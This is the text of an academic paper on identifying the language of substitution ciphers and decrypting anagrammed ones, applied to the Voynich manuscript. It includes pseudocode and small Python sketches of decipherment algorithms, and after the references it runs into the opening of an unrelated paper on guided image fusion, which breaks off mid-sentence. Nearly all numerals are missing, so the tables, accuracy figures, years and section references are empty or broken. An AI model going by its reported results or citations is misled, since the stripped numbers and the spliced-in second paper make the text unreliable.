formally, we define a function f that maps a word to an ordered n-tuple (t1, t2, . . . , tn), where ti ≥ tj if i < j. each ti is the number of occurrences of the ith most frequent character in the word. for example, f(seems) = (2, 2, 1), while f(beams) = (1, 1, 1, 1, 1). we refer to the resulting tuple as the decomposition pattern of the word. the decomposition pattern is unaffected by monoalphabetic letter substitution or anagramming. as with the character frequency method, we define the distance between two texts as the bhattacharyya distance between their decomposition pattern distributions, and classify the language of a ciphertext as the language of the nearest sample text.

it is worth noting that this method requires word separators to be preserved in the ciphertext. in fact, the effectiveness of the method comes partly from capturing the distribution of word lengths in a text. on the other hand, the decomposition patterns are independent of the ordering of characters within words. we will take advantage of this property in section .

. trial decipherment

the final method that we present involves deciphering the document in question into each candidate language. the decipherment is performed with a fast greedy-swap algorithm, which is related to the algorithms of ravi and knight ( ) and norvig ( ). it attempts to find the key that maximizes the probability of the decipherment according to a bigram character language model derived from a sample document in a given language. the decipherment with the highest probability indicates the most likely plaintext language of the document.

the greedy-swap algorithm is shown in figure . the initial key is created by pairing the ciphertext and plaintext symbols in the order of decreasing frequency, with null symbols appended to the shorter of the two alphabets. the algorithm repeatedly attempts to improve the current key k by considering the “best” swaps of ciphertext symbol pairs within the key (if the key is viewed as a permutation of the alphabet, such a swap is a transposition). the best swaps are defined as those that involve a symbol occurring among the least common bigrams in the decipherment induced by the current key. if any such swap yields a more probable decipherment, it is incorporated in the current key; otherwise, the algorithm terminates.

    kmax ← initial key
    for m iterations do
        k ← kmax
        s ← best swaps for k
        for each {c1, c2} ∈ s do
            k′ ← k(c1 ↔ c2)
            if p(k′) > p(kmax) then kmax ← k′
        if kmax = k then return kmax
    return kmax

figure : greedy-swap decipherment algorithm.

the total number of iterations is bounded by m, which is set to times the size of the alphabet. after the initial run, the algorithm is restarted times with a randomly generated initial key, which often results in a better decipherment. all parameters were established on a development set.
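an illustrative python rendering of the greedy-swap search in the figure above (not the authors' implementation) is given below; the bigram-model scoring function and the generation of candidate swaps are assumed to be supplied by the caller, since their details are described in the surrounding text.

```python
# greedy-swap key search; score(key) and best_swaps(key) are supplied by the caller.
def greedy_swap(initial_key, score, best_swaps, max_iterations):
    best_key = initial_key
    for _ in range(max_iterations):
        key = best_key
        for c1, c2 in best_swaps(key):
            candidate = swap(key, c1, c2)          # transpose two ciphertext symbols
            if score(candidate) > score(best_key):
                best_key = candidate
        if best_key == key:                        # no improving swap was found
            return best_key
    return best_key

def swap(key, c1, c2):
    new_key = dict(key)                            # key: ciphertext symbol -> plaintext symbol
    new_key[c1], new_key[c2] = key[c2], key[c1]
    return new_key
```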
evaluation we now directly evaluate the three methods de- scribed above by applying them to a set of cipher- texts from different languages. we adapted the dataset created by emerson et al. ( ) from the text of the universal declaration of human rights (udhr) in languages. the average length of the texts is words and characters. we divided the text in each language into % train- ing, % development, and % test. the training part was used to derive character bigram models for each language. the development and test parts were separately enciphered with a random substitution ci- pher. table shows the results of the language identifi- cation methods on both the development and the test set. we report the average top- accuracy on the task of identifying the source language of enciphered test samples. the differences between methods are statistically significant according to mcnemar’s test with p < . . the random baseline of . % in- dicates the difficulty of the task. the “oracle” de- cipherment assumes a perfect decipherment of the text, which effectively reduces the task to standard eight languages from the original set were excluded be- cause of formatting issues. method dev test random selection . . jaskiewicz ( ) . . character frequency . . decomposition pattern . . trial decipherment . . oracle decipherment . . table : language identification accuracy (in % correct) on ciphers representing languages. language identification. all three of our methods perform well, with the accuracy gains reflecting their increasing complex- ity. between the two character frequency methods, our approach based on bhattacharyya distance is significantly more accurate than the method of jask- iewicz ( ), which uses a specially-designed dis- tribution distance function. the decomposition pat- tern method makes many fewer errors, with the cor- rect language ranked second in roughly half of those cases. trial decipherment yields the best results, which are close to the upper bound for the character bigram probability approach to language identifica- tion. the average decipherment error rate into the correct language is only . %. in out of identi- fication errors made on the test set, the error rate is above the average; the other errors involve closely related languages, such as serbian and bosnian. the trial decipherment approach is much slower than the frequency distribution methods, requiring roughly one hour of cpu time in order to classify each ciphertext. more complex decipherment algo- rithms are even slower, which precludes their appli- cation to this test set. our re-implementations of the dynamic programming algorithm of knight et al. ( ), and the integer programming solver of ravi and knight ( ) average and seconds of cpu time, respectively, to solve a single charac- ter cipher, compared to . seconds with our greedy- swap method. the dynamic programming algorithm improves decipherment accuracy over our method by only % on a benchmark set of ciphers of characters. we conclude that our greedy-swap al- gorithm strikes the right balance between accuracy and speed required for the task of cipher language identification. anagram decryption in this section, we address the challenging task of deciphering a text in an unknown language written using an unknown script, and in which the letters within words have been randomly scrambled. 
the task is designed to emulate the decipherment prob- lem posed by the vms, with the assumption that its unusual ordering of characters within words re- flects some kind of a transposition cipher. we re- strict the source language to be one of the candi- date languages for which we have sample texts; we model an unknown script with a substitution cipher; and we impose no constraints on the letter transposi- tion method. the encipherment process is illustrated in figure . the goal in this instance is to recover the plaintext in (a) given the ciphertext in (c) without the knowledge of the plaintext language. we also con- sider an additional encipherment step that removes all vowels from the plaintext. our solution is composed of a sequence of three modules that address the following tasks: language identification, script decipherment, and anagram de- coding. for the first task we use the decomposition pattern frequency method described in section . , which is applicable to anagrammed ciphers. after identifying the plaintext language, we proceed to re- verse the substitution cipher using a heuristic search algorithm guided by a combination of word and character language models. finally, we unscramble the anagrammed words into readable text by fram- ing the decoding as a tagging task, which is effi- ciently solved with a viterbi decoder. our modular approach makes it easy to perform different levels of analysis on unsolved ciphers. . script decipherment for the decipherment step, we adapt the state-of-the- art solver of hauer et al. ( ). in this section, we describe the three main components of the solver: key scoring, key mutation, and tree search. this is followed by the summary of modifications that make the method work on anagrams. the scoring component evaluates the fitness of each key by computing the smoothed probability of the resulting decipherment with both character- level and word-level language models. the word- level models promote decipherments that contain (a) organized compositions through improvisational music into genres (b) fyovicstu dfnrfecpcfie pbyfzob cnryfgcevpcfivm nzecd cipf otiyte (c) otvfusyci cpifenfercfd bopbfzy fgyiemcpfcvrcnv nczed fpic etotyi (d) adegiknor ciimnooopsst ghhortu aaiiilmnooprstv cimsu inot eegnrs (e) adegiknor compositions through aaiiilmnooprstv music into greens figure : an example of the encryption and decryption process: (a) plaintext; (b) after applying a substitution cipher; (c) ciphertext after random anagramming; (d) after substitution decipherment (in the alphagram representation); (e) final decipherment after anagram decoding (errors are underlined). in-vocabulary words and high-probability word n- grams, while the character level models allow for the incorporation of out-of-vocabulary words. the key mutation component crucially depends on the notion of pattern equivalence between char- acter strings. two strings are pattern-equivalent if they share the same pattern of repeated letters. for example, mzxcx is pattern-equivalent with there and bases. but not with otter. for each word uni- gram, bigram, and trigram in the ciphertext, a list of the most frequent pattern equivalent n-grams from the training corpus is compiled. the solver repeat- edly attempts to improve the current key through a series of transpositions, so that a given cipher n- gram maps to a pattern-equivalent n-gram from the provided language sample. 
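a tiny illustration of this notion of pattern equivalence is given below; the candidate n-gram lists and the key scoring machinery of the solver are not shown, and lowercased strings are assumed.

```python
def repetition_pattern(word):
    # canonical pattern of repeated letters: each letter is replaced by the
    # index of its first occurrence, so "mzxcx" -> (0, 1, 2, 3, 2)
    seen = {}
    return tuple(seen.setdefault(ch, len(seen)) for ch in word)

def pattern_equivalent(a, b):
    # true if two strings share the same pattern of repeated letters
    return repetition_pattern(a) == repetition_pattern(b)

# examples from the text
assert pattern_equivalent("mzxcx", "there")
assert pattern_equivalent("mzxcx", "bases")
assert not pattern_equivalent("mzxcx", "otter")
```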
the number of substi- tutions for a given n-gram is limited to the k most promising candidates, where k is a parameter opti- mized on a development set. the key mutation procedure generates a tree structure, which is searched for the best-scoring de- cipherment using a version of beam search. the root of the tree contains the initial key, which is gener- ated according to simple frequency analysis (i.e., by mapping the n-th most common ciphertext character to the n-th most common character in the corpus). new tree leaves are spawned by modifying the keys of current leaves, while ensuring that each node in the tree has a unique key. at the end of computa- tion, the key with the highest score is returned as the solution. in our anagram adaptation, we relax the definition of pattern equivalence to include strings that have the same decomposition pattern, as defined in sec- tion . . under the new definition, the order of the letters within a word has no effect on pattern equiv- alence. for example, mzxcx is equivalent not only with there and bases, but also with three and otter, because all these words map to the ( , , , ) pat- tern. internally, we represent all words as alpha- grams, in which letters are reshuffled into the alpha- betical order (figure d). in order to handle the in- creased ambiguity, we use a letter-frequency heuris- tic to select the most likely mapping of letters within an n-gram. the trigram language models over both words and characters are derived by converting each word in the training corpus into its alphagram. on a benchmark set of ciphers of length , the av- erage error rate of the modified solver is . %, with only a small increase in time and space usage. . anagram decoder the output of the script decipherment step is gener- ally unreadable (see figure d). the words might be composed of the right letters but their order is unlikely to be correct. we proceed to decode the sequence of anagrams by framing it as a simple hid- den markov model, in which the hidden states corre- spond to plaintext words, and the observed sequence is composed of their anagrams. without loss of gen- erality, we convert anagrams into alphagrams, so that the emission probabilities are always equal to . any alphagrams that correspond to unseen words are replaced with a single ‘unknown’ type. we then use a modified viterbi decoder to determine the most likely word sequence according to a word trigram language model, which is derived from the train- ing corpus, and smoothed using deleted interpola- tion (jelinek and mercer, ). . vowel recovery many writing systems, including arabic and he- brew, are abjads that do not explicitly represent vow- els. reddy and knight ( ) provide evidence that the vms may encode an abjad. the removal of vowels represents a substantial loss of information, and appears to dramatically increase the difficulty of solving a cipher. in order to apply our system to abjads, we re- move all vowels in the corpora prior to deriving the language models used by the script decipherment step. we assume the ability to partition the plaintext symbols into disjoint sets of vowels and consonants for each candidate language. the anagram decoder is trained to recover complete in-vocabulary words from sequences of anagrams containing only conso- nants. at test time, we remove the vowels from the input to the decipherment step of the pipeline. in contrast with knight et al. 
( ), our approach is able not only to attack abjad ciphers, but also to re- store the vowels, producing fully readable text. . evaluation in order to test our anagram decryption pipeline on out-of-domain ciphertexts, the corpora for deriving language models need to be much larger than the udhr samples used in the previous section. we selected five diverse european languages from eu- roparl (koehn, ): english, bulgarian, german, greek, and spanish. the corresponding corpora contain about million words each, with the excep- tion of bulgarian which has only million words. we remove punctuation and numbers, and lowercase all text. we test on texts extracted from wikipedia articles on art, earth, europe, film, history, language, music, science, technology, and wikipedia. the texts are first enciphered using a substitution cipher, and then anagrammed (figure a-c). each of the five lan- guages is represented by ciphertexts, which are decrypted independently. in order to keep the run- ning time reasonable, the length of the ciphertexts is set to characters. the first step is language identification. our de- composition pattern method, which is resistant to both anagramming and substitution, correctly iden- tifies the source language of out of cipher- texts. the lone exception is the german article on technology, for which german is the second ranked language after greek. this error could be easily de- tected by noticing that most of the greek words “de- ciphered” by the subsequent steps are out of vocab- ulary. we proceed to evaluate the following steps assuming that the source language is known. step step both ceiling english . . . . bulgarian . . . . german . . . . greek . . . . spanish . . . . average . . . . table : word accuracy on the anagram decryption task. the results in table show that our system is able to effectively break the anagrammed ciphers in all five languages. for step (script decipherment), we count as correct all word tokens that contain the right characters, disregarding their order. step (ana- gram decoding) is evaluated under the assumption that it has received a perfect decipherment from step . on average, the accuracy of each individual step exceeds %. the values in the column denoted as both are the actual results of the pipeline composed of steps and . our system correctly recovers . % of word tokens, which corresponds to over % of the in-vocabulary words within the test files, the percentage of the in-vocabulary words, which are shown in the ceiling column, constitute the ef- fective accuracy limits for each language. the errors fall into three categories, as illustrated in figure e. step introduces decipherment errors (e.g., deciphering ‘s’ as ‘k’ instead of ‘z’ in “orga- nized”), which typically preclude the word from be- ing recovered in the next step. a decoding error in step may occur when an alphagram corresponds to multiple words (e.g. “greens” instead of “gen- res”), although most such ambiguities are resolved correctly. however, the majority of errors are caused by out-of-vocabulary (oov) words in the plaintext (e.g., “improvisational”). since the decoder can only produce words found in the training corpus, an oov word almost always results in an error. the german ciphers stand out as having the largest percentage of oov words ( . %), which may be attributed to fre- quent compounding. table shows the results of the analogous exper- iments on abjads (section . ). 
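the anagram decoding step described above can be sketched as a viterbi search over alphagram observations. this toy version uses a word bigram model in place of the smoothed trigram model of the paper, and the hand-made log-probability table is purely illustrative.

```python
from collections import defaultdict

def alphagram(word):
    # alphagram representation: the word's letters in alphabetical order
    return "".join(sorted(word))

def decode_anagrams(observed, vocab, bigram_logp, unk="<unk>"):
    # observed: list of alphagrams; vocab: iterable of known words;
    # bigram_logp(prev, word): log-probability of word given the previous word
    by_alpha = defaultdict(list)
    for w in vocab:
        by_alpha[alphagram(w)].append(w)
    # candidate words per position; unknown alphagrams map to a single <unk> type
    cands = [by_alpha.get(a, [unk]) for a in observed]
    best = {w: (bigram_logp("<s>", w), [w]) for w in cands[0]}
    for position in cands[1:]:
        new_best = {}
        for w in position:
            score, path = max(
                ((prev_score + bigram_logp(prev, w), prev_path)
                 for prev, (prev_score, prev_path) in best.items()),
                key=lambda t: t[0])
            new_best[w] = (score, path + [w])
        best = new_best
    return max(best.values(), key=lambda t: t[0])[1]

# toy usage: "genres" and "greens" share the alphagram "eegnrs"
vocab = ["music", "into", "genres", "greens"]
table = {("<s>", "music"): -1.0, ("music", "into"): -1.0,
         ("into", "genres"): -1.0, ("into", "greens"): -3.0}
lp = lambda p, w: table.get((p, w), -10.0)
obs = [alphagram(w) for w in ["music", "into", "genres"]]
print(decode_anagrams(obs, vocab, lp))   # ['music', 'into', 'genres']
```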
surprisingly, the removal of vowels from the plaintext actually im- proves the average decipherment step accuracy to %. this is due not only to the reduced number of step step both ceiling english . . . . bulgarian . . . . german . . . . greek . . . . spanish . . . . average . . . . table : word accuracy on the abjad anagram decryption task. distinct symbols, but also to the fewer possible ana- gramming permutations in the shortened words. on the other hand, the loss of vowel information makes the anagram decoding step much harder. however, more than three quarters of in-vocabulary tokens are still correctly recovered, including the original vow- els. in general, this is sufficient for a human reader to understand the meaning of the document, and de- duce the remaining words. voynich experiments in this section, we present the results of our experi- ments on the vms. we attempt to identify the source language with the methods described in section ; we quantify the similarity of the voynich words to alphagrams; and we apply our anagram decryption algorithm from section to the text. . data unless otherwise noted, the vms text used in our experiments corresponds to pages of the manuscript in the “type b” handwriting (vms-b), investigated by reddy and knight ( ), which we obtained directly from the authors. it con- tains , words and , characters, tran- scribed into characters of the currier alphabet (d’imperio, ). for the comparison experiments, we selected five languages shown in table , which have been suggested in the past as the language of the vms (kennedy and churchill, ). consider- ing the age of the manuscript, we attempt to use corpora that correspond to older versions of the languages, including king james bible, bibbia di gerusalemme, and vulgate. the differences in the ceiling numbers between tables and are due to words that are composed entirely of vowels. language text words characters english bible , , , italian bible , , , latin bible , , , hebrew tanach , , , arabic quran , , table : language corpora. . source language in this section, we present the results of our cipher- text language identification methods from section on the vms text. the closest language according to the letter fre- quency method is mazatec, a native american lan- guage from southern mexico. since the vms was created before the voyage of columbus, a new world language is an unlikely candidate. the top ten languages also include mozarabic ( ), italian ( ), and ladino ( ), all of which are plausible guesses. however, the experiments in section . demon- strate that the frequency analysis is much less reli- able than the other two methods. the top-ranking languages according to the de- composition pattern method are hebrew, malay (in arabic script), standard arabic, and amharic, in this order. we note that three of these belong to the semitic family. the similarity of decomposition patterns between hebrew and the vms is striking. the bhattacharyya distance between the respective distributions is . , compared to . for the second-ranking malay. the histogram in figure shows hebrew as a single outlier in the leftmost bin. in fact, hebrew is closer to a sample of the vms of a similar length than to any of the remaining udhr samples. the ranking produced by the the trial decipher- ment method is sensitive to parameter changes; how- ever, the two languages that consistently appear near the top of the list are hebrew and esperanto. the high rank of hebrew corroborates the outcome of the decomposition pattern method. 
being a relatively recent creation, esperanto itself can be excluded as the ciphertext language, but its high score is remark- able in view of the well-known theory that the vms text represents a constructed language. we hypoth- the theory was first presented in the form of an ana- figure : histogram of distances between the vms and samples of other languages, as determined by the de- composition pattern method. the single outlier on the left is hebrew. esize that the extreme morphological regularity of esperanto (e.g., all plural nouns contain the bigram ‘oj’) yields an unusual bigram character language model which fits the repetitive nature of the vms words. in summary, while there is no complete agree- ment between the three methods about the most likely underlying source language, there appears to be a strong statistical support for hebrew from the two most accurate methods, one of which is robust against anagramming. in addition, the language is a plausible candidate on historical grounds, being widely-used for writing in the middle ages. in fact, a number of cipher techniques, including anagram- ming, can be traced to the jewish cabala (kennedy and churchill, ). . alphagrams in this section, we quantify the peculiarity of the vms lexicon by modeling the words as alphagrams. we introduce the notion of the alphagram distance, and compute it for the vms and for natural language samples. we define a word’s alphagram distance with re- spect to an ordering of the alphabet as the number of letter pairs that are in the wrong order. for example, with respect to the qwerty keyboard order, the word rye has an alphagram distance of because it contains two letter pairs that violate the order: (r, e) and (y, e). a word is an alphagram if and only if its alphagram distance is zero. the maximum alpha- gram distance for a word of length n is equal to the number of its distinct letter pairs. gram (friedman and friedman, ). see also a more recent proposal by balandin and averyanov ( ). in order to quantify how strongly the words in a language resemble alphagrams, we first need to identify the order of the alphabet that minimizes the total alphagram distance of a representative text sample. the decision version of this problem is np- complete, which can be demonstrated by a reduc- tion from the path variant of the traveling salesman problem. instead, we find an approximate solution with the following greedy search algorithm. starting from an initial order in which the letters first occur in the text, we repeatedly consider all possible new positions for a letter within the current order, and choose the one that yields the lowest total alphagram distance of the text. this process is repeated until no better order is found for iterations, with ran- dom restarts. when applied to a random sample of , word tokens from the vms, our algorithm yields the or- der bzovpefsxqywc arutij *ghk mdln , which corresponds to the average alphagram dis- tance of . (i.e., slightly less than one pair of let- ters per word). the corresponding result on english is jzbqwxcpathofvurimslkengdy, with an average alphagram distance of . . note that the letters at the beginning of the sequence tend to have low frequency, while the ones at the end occur in popular morphological suffixes, such as −ed and −ly. 
for example, the beginning of the first arti- cle of the udhr with the letters transposed to fol- low this order becomes: “all ahumn biseng are born free and qaule in tiingdy and thrisg.” to estimate how close the solution produced by our greedy algorithm is to the actual optimal solu- tion, we also calculate a lower bound for the total alphagram distance with any character order. the lower bound is ∑ x,y min(bxy, byx), where bxy is the number of times character x occurs before character y within words in the text. figure shows the average alphagram distances for the vms and five comparison languages, each represented by a random sample of , word to- kens which exclude single-letter words. the ex- pected values correspond to a completely random intra-word letter order. the lexicographic values correspond to the standard alphabetic order in each language. the actual minimum alphagram distance is between the lower bound and the computed min- imum obtained by our greedy algorithm. figure : average word alphagram distances. the results in figure show that while the ex- pected alphagram distance for the vms falls within the range exhibited by natural languages, its mini- mum alphagram distance is exceptionally low. in absolute terms, the vms minimum is less than half the corresponding number for hebrew. in relative terms, the ratio of the expected distance to the min- imum distance is below for any of the five lan- guages, but above for the vms. these results sug- gest that, if the vms encodes a natural language text, the letters within the words may have been re- ordered during the encryption process. . decipherment experiments in this section, we discuss the results of applying our anagram decryption system described in section to the vms text. we decipher each of the first pages of the vms-b using the five language models derived from the corpora described in section . . the pages con- tain between and words, in total. fig- ure shows the average percentage of in-vocabulary words in the decipherments. the percentage is significantly higher for hebrew than for the other languages, which suggests a better match with the vms. although the abjad versions of english, ital- ian, and latin yield similar levels of in-vocabulary words, their distances to the vms language accord- ing to the decomposition pattern method are . , . , and . respectively, well above hebrew’s . . none of the decipherments appear to be syntac- tically correct or semantically consistent. this is expected because our system is designed for pure monoalphabetic substitution ciphers. if the vms indeed represents one of the five languages, the amount of noise inherent in the orthography and the transcription would prevent the system from pro- ducing a correct decipherment. for example, in a hypothetical non-standard orthography of hebrew, some prepositions or determiners could be written as separate one-letter words, or a single phoneme could have two different representations. in addi- tion, because of the age of the manuscript and the variety of its hand-writing styles, any transcription requires a great deal of guesswork regarding the separation of individual words into distinct symbols (figure ). finally, the decipherments necessarily reflect the corpora that underlie the language model, which may correspond to a different domain and his- torical period. nevertheless, it is interesting to take a closer look at specific examples of the system output. 
the first line of the vms (vas fae ar apam zoe zor qor for zoe ) is deciphered into hebrew as אנשיו עלי ו לביחו אליו איש nהכה לה ועשה .המצות according to a native speaker of the lan- guage, this is not quite a coherent sentence. how- ever, after making a couple of spelling corrections, google translate is able to convert it into passable english: “she made recommendations to the priest, man of the house and me and people.” even though the input ciphertext is certainly too noisy to result in a fluent output, the system might still manage to correctly decrypt individual words in a longer passage. in order to limit the influence of context in the decipherment, we restrict the word language model to unigrams, and apply our sys- tem to the first words ( characters) from the “herbal” section of the vms, which contains draw- ings of plants. an inspection of the output reveals several words that would not be out of place in a me- dieval herbal, such as הצר ‘narrow’, איכר ‘farmer’, אור ‘light’, אויר ‘air’, אׁש ‘fire’. the results presented in this section could be in- terpreted either as tantalizing clues for hebrew as hebrew is written from right to left. https://translate.google.com/ (accessed nov. , ). the length of the passage was chosen to match the number of symbols in the phaistos disc inscription. figure : average percentage of in-vocabulary words in the decipherments of the first ten pages of the vms. the source language of the vms, or simply as ar- tifacts of the combinatorial power of anagramming and language models. we note that the vms deci- pherment claims in the past have typically been lim- ited to short passages, without ever producing a full solution. in any case, the output of an algorithmic decipherment of a noisy input can only be a starting point for scholars that are well-versed in the given language and historical period. conclusion we have presented a multi-stage system for solv- ing ciphers that combine monoalphabetic letter sub- stitution and unconstrained intra-word letter trans- position to encode messages in an unknown lan- guage. we have evaluated three methods of cipher- text language identification that are based on letter frequency, decomposition patterns, and trial deci- pherment, respectively. we have demonstrated that our language-independent approach can effectively break anagrammed substitution ciphers, even when vowels are removed from the input. the application of our methods to the voynich manuscript suggests that it may represent hebrew, or another abjad script, with the letters rearranged to follow a fixed order. there are several possible directions for the future work. the pipeline approach presented in this pa- per might be outperformed by a unified generative model. the techniques could be made more resis- tant to noise; for example, by softening the emission model in the anagram decoding phase. it would also be interesting to jointly identify both the language and the type of the cipher (nuhn and knight, ), software at https://www.cs.ualberta.ca/˜kondrak/. which could lead to the development of methods to handle more complex ciphers. finally, the anagram decoding task could be extended to account for the transposition of words within lines, in addition to the transposition of symbols within words. acknowledgements we thank prof. moshe koppel for the assessment of the hebrew examples. we thank the reviewers for their comments and suggestions. 
this research was supported by the natural sci- ences and engineering research council of canada, and by alberta innovates – technology futures and alberta innovation & advanced education. references arcady balandin and sergey averyanov. . the voynich manuscript: new approaches to deciphering via a constructed logical language. a. bhattacharyya. . on a measure of divergence be- tween two statistical populations defined by their prob- ability distributions. bull. calcutta math. soc., : – . mary e. d’imperio. . the voynich manuscript: an elegant enigma. technical report, dtic document. guy emerson, liling tan, susanne fertmann, alexis palmer, and michaela regneri. . seedling: building and using a seed corpus for the human lan- guage project. in workshop on the use of computa- tional methods in the study of endangered languages, pages – . joseph martin feely. . roger bacon’s cypher. the right key found. rochester, ny. william f. friedman and elizebeth s. friedman. . acrostics, anagrams, and chaucer. philological quar- terly, ( ): – . bradley hauer, ryan hayward, and grzegorz kondrak. . solving substitution ciphers with combined lan- guage models. in coling, pages – . grzegorz jaskiewicz. . analysis of letter frequency distribution in the voynich manuscript. in interna- tional workshop on concurrency, specification and programming (cs&p’ ), pages – . frederick jelinek and robert l. mercer. . inter- polated estimation of markov source parameters from sparse data. pattern recognition in practice. gerry kennedy and rob churchill. . the voynich manuscript: the mysterious code that has defied inter- pretation for centuries. inner traditions/bear & co. kevin knight, anish nair, nishit rathod, and kenji ya- mada. . unsupervised analysis for decipherment problems. in coling/acl, pages – . kevin knight, beáta megyesi, and christiane schaefer. . the copiale cipher. in th workshop on build- ing and using comparable corpora: comparable corpora and the web, pages – . philipp koehn. . europarl: a parallel corpus for sta- tistical machine translation. in mt summit, volume , pages – . gabriel landini. . evidence of linguistic struc- ture in the voynich manuscript using spectral analysis. cryptologia, ( ): – . john matthews manly. . roger bacon and the voynich ms. speculum, ( ): – . marcelo a. montemurro and damián h. zanette. . keywords and co-occurrence patterns in the voynich manuscript: an information-theoretic analysis. plos one, ( ):e . george nagy, sharad seth, and kent einspahr. . decoding substitution ciphers by means of word matching with application to ocr. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . william romaine newbold and roland grubb kent. . the cipher of roger bacon. university of pennsylvania press. peter norvig. . natural language corpus data. in toby segaran and jeff hammerbacher, editors, beau- tiful data: the stories behind elegant data solutions. o’reilly. malte nuhn and kevin knight. . cipher type detec- tion. in emnlp, pages – . sujith ravi and kevin knight. . attacking deci- pherment problems optimally with low-order n-gram models. in emnlp, pages – . sujith ravi and kevin knight. . learning phoneme mappings for transliteration without parallel data. in naacl, pages – . sravana reddy and kevin knight. . what we know about the voynich manuscript. in th acl-hlt work- shop on language technology for cultural heritage, social sciences, and humanities, pages – . andrew robinson. . lost languages: the enigma of the world’s undeciphered scripts. mcgraw-hill. 
gordon rugg. . an elegant hoax? a possible solution to the voynich manuscript. cryptologia, ( ): – . andreas schinner. . the voynich manuscript: evi- dence of the hoax hypothesis. cryptologia, ( ): – . klaus schmeh. . a milestone in voyn- ich manuscript research: voynich conference in monte porzio catone, italy. cryptologia, ( ): – . simon singh. . the code book: the science of secrecy from ancient egypt to quantum cryptography. anchor. leonell c strong. . anthony askham, the author of the voynich manuscript. science, ( ): – . john tiltman. . the voynich manuscript, the most mysterious manuscript in the world. baltimore bib- liophiles. submitted june accepted july published august corresponding author alexander toet, lextoet@gmail.com academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright toet distributed under creative commons cc-by . open access iterative guided image fusion alexander toet tno soesterberg, netherlands abstract we propose a multi-scale image fusion scheme based on guided filtering. guided filtering can effectively reduce noise while preserving detail boundaries. when applied in an iterative mode, guided filtering selectively eliminates small scale details while restoring larger scale edges. the proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. first, size-selective iterative guided filtering is applied to decompose the source images into approximation and residual layers at multiple spatial scales. then, frequency-tuned filtering is used to compute saliency maps at successive spatial scales. next, at each spatial scale binary weighting maps are obtained as the pixelwise maximum of corresponding source saliency maps. guided filtering of the binary weighting maps with their corresponding source images as guidance images serves to reduce noise and to restore spatial consistency. the final fused image is obtained as the weighted recombination of the individual residual layers and the mean of the approximation layers at the coarsest spatial scale. application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. the method has a simple implementation and is computationally efficient. subjects computer vision keywords image fusion, guided filter, saliency, infrared, nightvision, thermal imagery, intensified imagery introduction the increasing deployment and availability of co-registered multimodal imagery from different types of sensors has spurred the development of image fusion techniques. the information provided by different sensors registering the same scene can either be (partially) redundant or complementary and may be corrupted with noise. effective combinations of complementary and partially redundant multispectral imagery can therefore visualize information that is not directly evident from the individual input images. for instance, in nighttime (low-light) outdoor surveillance applications, intensified visual (ii) or near- infrared (nir) imagery often provides a detailed but noisy representation of a scene. while different types of noise may result from several processes associated with the underlying sensor physics, additive noise is typically the predominant noise component encountered in ii and nir imagery (petrovic & xydeas, ). 
additive noise can be modelled as a random signal that is simply added to the original signal. as a result, additive noise may obscure or distort relevant image details. in addition, targets of interest like persons or cars how to cite this article toet ( ), iterative guided image fusion. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:lextoet@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. are sometimes hard to distinguish in ii or nir imagery because of their low luminance contrast. while thermal infrared (ir) imagery typically represents these targets with high contrast, their background (context) is often washed out due to low thermal contrast. in this case, a fused image that clearly represents both the targets and their background enables a user to assess the location of targets relative to landmarks in their surroundings, thus providing more information than either of the input images alone. some potential benefits of image fusion are: wider spatial and temporal coverage, decreased uncertainty, improved reliability, and increased system robustness. image fusion has important applications in defense and security for situational awareness (toet et al., ), surveillance (shah et al., ; zhu & huang, ), target tracking (motamed, lherbier & hamad, ; zou & bhanu, ), intelligence gathering (o’brien & irvine, ), concealed weapon detection (bhatnagar & wu, ; liu et al., ; toet, ; xue & blum, ; xue, blum & li, ; yajie & mowu, ), detection of abandoned packages (beyan, yigit & temizel, ) and buried explosives (lepley & averill, ), and face recognition (kong et al., ; singh, vatsa & noore, ). other important image fusion applications are found in industry (tian et al., ), art analysis (zitová, beneš & blažek, ), agriculture (bulanona, burks & alchanatis, ), remote sensing (ghassemian, ; jacobson & gupta, ; jacobson, gupta & cole, ; jiang et al., ) and medicine (agarwal & bedi, ; biswas, chakrabarti & dey, ; daneshvar & ghassemian, ; singh & khare, ; wang, li & tian, ; yang & liu, ) (for a survey of different applications of image fusion techniques see blum & liu ( ). in general, image fusion aims to represent the visual information from any number of input images in a single composite (fused) image that is more informative than each of the input images alone, eliminating noise in the process while preventing both the loss of essential information and the introduction of artefacts. this requires the availability of filters that combine the extraction of relevant image details with noise reduction. to date, a variety of image fusion algorithms have been proposed. a popular class of algorithms are the multi-scale image fusion schemes, which decompose the source images into spatial primitives at multiple spatial scales, then integrate these primitives to form a new (‘fused’) multi-scale representation, and finally apply an inverse multi-scale transform to reconstruct the fused image. 
examples of this approach are for instance the laplacian pyramid (burt & adelson, ), the ratio of low-pass pyramid (toet, b), the contrast pyramid (toet, van ruyven & valeton, ), the filter-subtract-decimate laplacian pyramid (burt, ; burt & kolczynski, ), the gradient pyramid (burt, ; burt & kolczynski, ), the morphological pyramid (toet, a), the discrete wavelet transform (lemeshewsky, ; li, manjunath & mitra, ; li, kwok & wang, ; scheunders & de backer, ), the shift invariant discrete wavelet transform (lemeshewsky, ; rockinger, ; rockinger, ; rockinger & fechner, ), the contourlet (yang et al., ), the shift-invariant shearlet transform (wang, li & tian, ), the non- subsampled shearlet transform (kong, wang & lei, ; liu et al., ; zhang et al., ), the ridgelet transform (tao, junping & ye, ). the filters applied in several of the earlier techniques typically produce halo artefacts near edges. more recent methods like toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. shearlets, contourlets and ridgelets are better capable to preserve local image features but are often complex or time-consuming. non-linear edge-preserving smoothing filters such as anisotropic diffusion (perona & malik, ), robust smoothing (black et al., ) and the bilateral filter (tomasi & manduchi, ) may appear effective tools to prevent artefacts that arise from spatial inconsistencies in multi-scale image fusion schemes. however, anisotropic diffusion tends to over-sharpen edges and is computationally expensive, which makes it less suitable for application in multi-scale fusion schemes (farbman et al., ). the non-linear bilateral filter (blf) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value 